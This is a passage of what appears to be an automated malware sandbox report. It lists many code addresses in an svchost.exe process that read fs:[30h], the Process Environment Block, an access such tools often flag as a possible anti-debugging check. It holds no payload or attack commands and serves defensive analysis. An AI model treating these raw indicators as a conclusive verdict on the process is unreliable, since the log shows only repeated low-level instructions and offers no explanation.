            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B019F mov eax, dword ptr fs:[00000030h]9_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B019F mov eax, dword ptr fs:[00000030h]9_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B019F mov eax, dword ptr fs:[00000030h]9_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B019F mov eax, dword ptr fs:[00000030h]9_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362A197 mov eax, dword ptr fs:[00000030h]9_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362A197 mov eax, dword ptr fs:[00000030h]9_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362A197 mov eax, dword ptr fs:[00000030h]9_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365C073 mov eax, dword ptr fs:[00000030h]9_2_0365C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03632050 mov eax, dword ptr fs:[00000030h]9_2_03632050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B6050 mov eax, dword ptr fs:[00000030h]9_2_036B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362A020 mov eax, dword ptr fs:[00000030h]9_2_0362A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362C020 mov eax, dword ptr fs:[00000030h]9_2_0362C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C6030 mov eax, dword ptr fs:[00000030h]9_2_036C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B4000 mov ecx, dword ptr fs:[00000030h]9_2_036B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036D2000 mov eax, dword ptr fs:[00000030h]9_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036D2000 mov eax, dword ptr fs:[00000030h]9_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036D2000 mov eax, dword ptr fs:[00000030h]9_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036D2000 mov eax, dword ptr fs:[00000030h]9_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036D2000 mov eax, dword ptr fs:[00000030h]9_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036D2000 mov eax, dword ptr fs:[00000030h]9_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036D2000 mov eax, dword ptr fs:[00000030h]9_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036D2000 mov eax, dword ptr fs:[00000030h]9_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364E016 mov eax, dword ptr fs:[00000030h]9_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364E016 mov eax, dword ptr fs:[00000030h]9_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364E016 mov eax, dword ptr fs:[00000030h]9_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364E016 mov eax, dword ptr fs:[00000030h]9_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362A0E3 mov ecx, dword ptr fs:[00000030h]9_2_0362A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036380E9 mov eax, dword ptr fs:[00000030h]9_2_036380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B60E0 mov eax, dword ptr fs:[00000030h]9_2_036B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362C0F0 mov eax, dword ptr fs:[00000030h]9_2_0362C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036720F0 mov ecx, dword ptr fs:[00000030h]9_2_036720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B20DE mov eax, dword ptr fs:[00000030h]9_2_036B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036280A0 mov eax, dword ptr fs:[00000030h]9_2_036280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C80A8 mov eax, dword ptr fs:[00000030h]9_2_036C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F60B8 mov eax, dword ptr fs:[00000030h]9_2_036F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F60B8 mov ecx, dword ptr fs:[00000030h]9_2_036F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363208A mov eax, dword ptr fs:[00000030h]9_2_0363208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03638770 mov eax, dword ptr fs:[00000030h]9_2_03638770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640770 mov eax, dword ptr fs:[00000030h]9_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640770 mov eax, dword ptr fs:[00000030h]9_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640770 mov eax, dword ptr fs:[00000030h]9_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640770 mov eax, dword ptr fs:[00000030h]9_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640770 mov eax, dword ptr fs:[00000030h]9_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640770 mov eax, dword ptr fs:[00000030h]9_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640770 mov eax, dword ptr fs:[00000030h]9_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640770 mov eax, dword ptr fs:[00000030h]9_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640770 mov eax, dword ptr fs:[00000030h]9_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640770 mov eax, dword ptr fs:[00000030h]9_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640770 mov eax, dword ptr fs:[00000030h]9_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640770 mov eax, dword ptr fs:[00000030h]9_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366674D mov esi, dword ptr fs:[00000030h]9_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366674D mov eax, dword ptr fs:[00000030h]9_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366674D mov eax, dword ptr fs:[00000030h]9_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03630750 mov eax, dword ptr fs:[00000030h]9_2_03630750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036BE75D mov eax, dword ptr fs:[00000030h]9_2_036BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672750 mov eax, dword ptr fs:[00000030h]9_2_03672750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672750 mov eax, dword ptr fs:[00000030h]9_2_03672750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B4755 mov eax, dword ptr fs:[00000030h]9_2_036B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366C720 mov eax, dword ptr fs:[00000030h]9_2_0366C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366C720 mov eax, dword ptr fs:[00000030h]9_2_0366C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366273C mov eax, dword ptr fs:[00000030h]9_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366273C mov ecx, dword ptr fs:[00000030h]9_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366273C mov eax, dword ptr fs:[00000030h]9_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AC730 mov eax, dword ptr fs:[00000030h]9_2_036AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366C700 mov eax, dword ptr fs:[00000030h]9_2_0366C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03630710 mov eax, dword ptr fs:[00000030h]9_2_03630710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03660710 mov eax, dword ptr fs:[00000030h]9_2_03660710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036527ED mov eax, dword ptr fs:[00000030h]9_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036527ED mov eax, dword ptr fs:[00000030h]9_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036527ED mov eax, dword ptr fs:[00000030h]9_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036BE7E1 mov eax, dword ptr fs:[00000030h]9_2_036BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036347FB mov eax, dword ptr fs:[00000030h]9_2_036347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036347FB mov eax, dword ptr fs:[00000030h]9_2_036347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363C7C0 mov eax, dword ptr fs:[00000030h]9_2_0363C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B07C3 mov eax, dword ptr fs:[00000030h]9_2_036B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036307AF mov eax, dword ptr fs:[00000030h]9_2_036307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E47A0 mov eax, dword ptr fs:[00000030h]9_2_036E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036D678E mov eax, dword ptr fs:[00000030h]9_2_036D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F866E mov eax, dword ptr fs:[00000030h]9_2_036F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F866E mov eax, dword ptr fs:[00000030h]9_2_036F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366A660 mov eax, dword ptr fs:[00000030h]9_2_0366A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366A660 mov eax, dword ptr fs:[00000030h]9_2_0366A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03662674 mov eax, dword ptr fs:[00000030h]9_2_03662674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364C640 mov eax, dword ptr fs:[00000030h]9_2_0364C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364E627 mov eax, dword ptr fs:[00000030h]9_2_0364E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03666620 mov eax, dword ptr fs:[00000030h]9_2_03666620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03668620 mov eax, dword ptr fs:[00000030h]9_2_03668620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363262C mov eax, dword ptr fs:[00000030h]9_2_0363262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AE609 mov eax, dword ptr fs:[00000030h]9_2_036AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364260B mov eax, dword ptr fs:[00000030h]9_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364260B mov eax, dword ptr fs:[00000030h]9_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364260B mov eax, dword ptr fs:[00000030h]9_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364260B mov eax, dword ptr fs:[00000030h]9_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364260B mov eax, dword ptr fs:[00000030h]9_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364260B mov eax, dword ptr fs:[00000030h]9_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364260B mov eax, dword ptr fs:[00000030h]9_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672619 mov eax, dword ptr fs:[00000030h]9_2_03672619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AE6F2 mov eax, dword ptr fs:[00000030h]9_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AE6F2 mov eax, dword ptr fs:[00000030h]9_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AE6F2 mov eax, dword ptr fs:[00000030h]9_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AE6F2 mov eax, dword ptr fs:[00000030h]9_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B06F1 mov eax, dword ptr fs:[00000030h]9_2_036B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B06F1 mov eax, dword ptr fs:[00000030h]9_2_036B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366A6C7 mov ebx, dword ptr fs:[00000030h]9_2_0366A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366A6C7 mov eax, dword ptr fs:[00000030h]9_2_0366A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366C6A6 mov eax, dword ptr fs:[00000030h]9_2_0366C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036666B0 mov eax, dword ptr fs:[00000030h]9_2_036666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03634690 mov eax, dword ptr fs:[00000030h]9_2_03634690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03634690 mov eax, dword ptr fs:[00000030h]9_2_03634690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366656A mov eax, dword ptr fs:[00000030h]9_2_0366656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366656A mov eax, dword ptr fs:[00000030h]9_2_0366656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366656A mov eax, dword ptr fs:[00000030h]9_2_0366656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03638550 mov eax, dword ptr fs:[00000030h]9_2_03638550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03638550 mov eax, dword ptr fs:[00000030h]9_2_03638550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640535 mov eax, dword ptr fs:[00000030h]9_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640535 mov eax, dword ptr fs:[00000030h]9_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640535 mov eax, dword ptr fs:[00000030h]9_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640535 mov eax, dword ptr fs:[00000030h]9_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640535 mov eax, dword ptr fs:[00000030h]9_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640535 mov eax, dword ptr fs:[00000030h]9_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365E53E mov eax, dword ptr fs:[00000030h]9_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365E53E mov eax, dword ptr fs:[00000030h]9_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365E53E mov eax, dword ptr fs:[00000030h]9_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365E53E mov eax, dword ptr fs:[00000030h]9_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365E53E mov eax, dword ptr fs:[00000030h]9_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C6500 mov eax, dword ptr fs:[00000030h]9_2_036C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03704500 mov eax, dword ptr fs:[00000030h]9_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03704500 mov eax, dword ptr fs:[00000030h]9_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03704500 mov eax, dword ptr fs:[00000030h]9_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03704500 mov eax, dword ptr fs:[00000030h]9_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03704500 mov eax, dword ptr fs:[00000030h]9_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03704500 mov eax, dword ptr fs:[00000030h]9_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03704500 mov eax, dword ptr fs:[00000030h]9_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365E5E7 mov eax, dword ptr fs:[00000030h]9_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365E5E7 mov eax, dword ptr fs:[00000030h]9_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365E5E7 mov eax, dword ptr fs:[00000030h]9_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365E5E7 mov eax, dword ptr fs:[00000030h]9_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365E5E7 mov eax, dword ptr fs:[00000030h]9_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365E5E7 mov eax, dword ptr fs:[00000030h]9_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365E5E7 mov eax, dword ptr fs:[00000030h]9_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365E5E7 mov eax, dword ptr fs:[00000030h]9_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036325E0 mov eax, dword ptr fs:[00000030h]9_2_036325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366C5ED mov eax, dword ptr fs:[00000030h]9_2_0366C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366C5ED mov eax, dword ptr fs:[00000030h]9_2_0366C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366E5CF mov eax, dword ptr fs:[00000030h]9_2_0366E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366E5CF mov eax, dword ptr fs:[00000030h]9_2_0366E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036365D0 mov eax, dword ptr fs:[00000030h]9_2_036365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366A5D0 mov eax, dword ptr fs:[00000030h]9_2_0366A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366A5D0 mov eax, dword ptr fs:[00000030h]9_2_0366A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B05A7 mov eax, dword ptr fs:[00000030h]9_2_036B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B05A7 mov eax, dword ptr fs:[00000030h]9_2_036B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B05A7 mov eax, dword ptr fs:[00000030h]9_2_036B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036545B1 mov eax, dword ptr fs:[00000030h]9_2_036545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036545B1 mov eax, dword ptr fs:[00000030h]9_2_036545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03632582 mov eax, dword ptr fs:[00000030h]9_2_03632582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03632582 mov ecx, dword ptr fs:[00000030h]9_2_03632582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03664588 mov eax, dword ptr fs:[00000030h]9_2_03664588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366E59C mov eax, dword ptr fs:[00000030h]9_2_0366E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036BC460 mov ecx, dword ptr fs:[00000030h]9_2_036BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365A470 mov eax, dword ptr fs:[00000030h]9_2_0365A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365A470 mov eax, dword ptr fs:[00000030h]9_2_0365A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365A470 mov eax, dword ptr fs:[00000030h]9_2_0365A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366E443 mov eax, dword ptr fs:[00000030h]9_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366E443 mov eax, dword ptr fs:[00000030h]9_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366E443 mov eax, dword ptr fs:[00000030h]9_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366E443 mov eax, dword ptr fs:[00000030h]9_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366E443 mov eax, dword ptr fs:[00000030h]9_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366E443 mov eax, dword ptr fs:[00000030h]9_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366E443 mov eax, dword ptr fs:[00000030h]9_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366E443 mov eax, dword ptr fs:[00000030h]9_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036EA456 mov eax, dword ptr fs:[00000030h]9_2_036EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362645D mov eax, dword ptr fs:[00000030h]9_2_0362645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365245A mov eax, dword ptr fs:[00000030h]9_2_0365245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362E420 mov eax, dword ptr fs:[00000030h]9_2_0362E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362E420 mov eax, dword ptr fs:[00000030h]9_2_0362E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362E420 mov eax, dword ptr fs:[00000030h]9_2_0362E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362C427 mov eax, dword ptr fs:[00000030h]9_2_0362C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B6420 mov eax, dword ptr fs:[00000030h]9_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B6420 mov eax, dword ptr fs:[00000030h]9_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B6420 mov eax, dword ptr fs:[00000030h]9_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B6420 mov eax, dword ptr fs:[00000030h]9_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B6420 mov eax, dword ptr fs:[00000030h]9_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B6420 mov eax, dword ptr fs:[00000030h]9_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B6420 mov eax, dword ptr fs:[00000030h]9_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366A430 mov eax, dword ptr fs:[00000030h]9_2_0366A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03668402 mov eax, dword ptr fs:[00000030h]9_2_03668402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03668402 mov eax, dword ptr fs:[00000030h]9_2_03668402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03668402 mov eax, dword ptr fs:[00000030h]9_2_03668402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036304E5 mov ecx, dword ptr fs:[00000030h]9_2_036304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036364AB mov eax, dword ptr fs:[00000030h]9_2_036364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036644B0 mov ecx, dword ptr fs:[00000030h]9_2_036644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036BA4B0 mov eax, dword ptr fs:[00000030h]9_2_036BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036EA49A mov eax, dword ptr fs:[00000030h]9_2_036EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362CB7E mov eax, dword ptr fs:[00000030h]9_2_0362CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E4B4B mov eax, dword ptr fs:[00000030h]9_2_036E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E4B4B mov eax, dword ptr fs:[00000030h]9_2_036E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03702B57 mov eax, dword ptr fs:[00000030h]9_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03702B57 mov eax, dword ptr fs:[00000030h]9_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03702B57 mov eax, dword ptr fs:[00000030h]9_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03702B57 mov eax, dword ptr fs:[00000030h]9_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C6B40 mov eax, dword ptr fs:[00000030h]9_2_036C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C6B40 mov eax, dword ptr fs:[00000030h]9_2_036C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036FAB40 mov eax, dword ptr fs:[00000030h]9_2_036FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036D8B42 mov eax, dword ptr fs:[00000030h]9_2_036D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03628B50 mov eax, dword ptr fs:[00000030h]9_2_03628B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036DEB50 mov eax, dword ptr fs:[00000030h]9_2_036DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365EB20 mov eax, dword ptr fs:[00000030h]9_2_0365EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365EB20 mov eax, dword ptr fs:[00000030h]9_2_0365EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F8B28 mov eax, dword ptr fs:[00000030h]9_2_036F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F8B28 mov eax, dword ptr fs:[00000030h]9_2_036F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03704B00 mov eax, dword ptr fs:[00000030h]9_2_03704B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AEB1D mov eax, dword ptr fs:[00000030h]9_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AEB1D mov eax, dword ptr fs:[00000030h]9_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AEB1D mov eax, dword ptr fs:[00000030h]9_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AEB1D mov eax, dword ptr fs:[00000030h]9_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AEB1D mov eax, dword ptr fs:[00000030h]9_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AEB1D mov eax, dword ptr fs:[00000030h]9_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AEB1D mov eax, dword ptr fs:[00000030h]9_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AEB1D mov eax, dword ptr fs:[00000030h]9_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AEB1D mov eax, dword ptr fs:[00000030h]9_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03638BF0 mov eax, dword ptr fs:[00000030h]9_2_03638BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03638BF0 mov eax, dword ptr fs:[00000030h]9_2_03638BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03638BF0 mov eax, dword ptr fs:[00000030h]9_2_03638BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365EBFC mov eax, dword ptr fs:[00000030h]9_2_0365EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036BCBF0 mov eax, dword ptr fs:[00000030h]9_2_036BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03650BCB mov eax, dword ptr fs:[00000030h]9_2_03650BCB
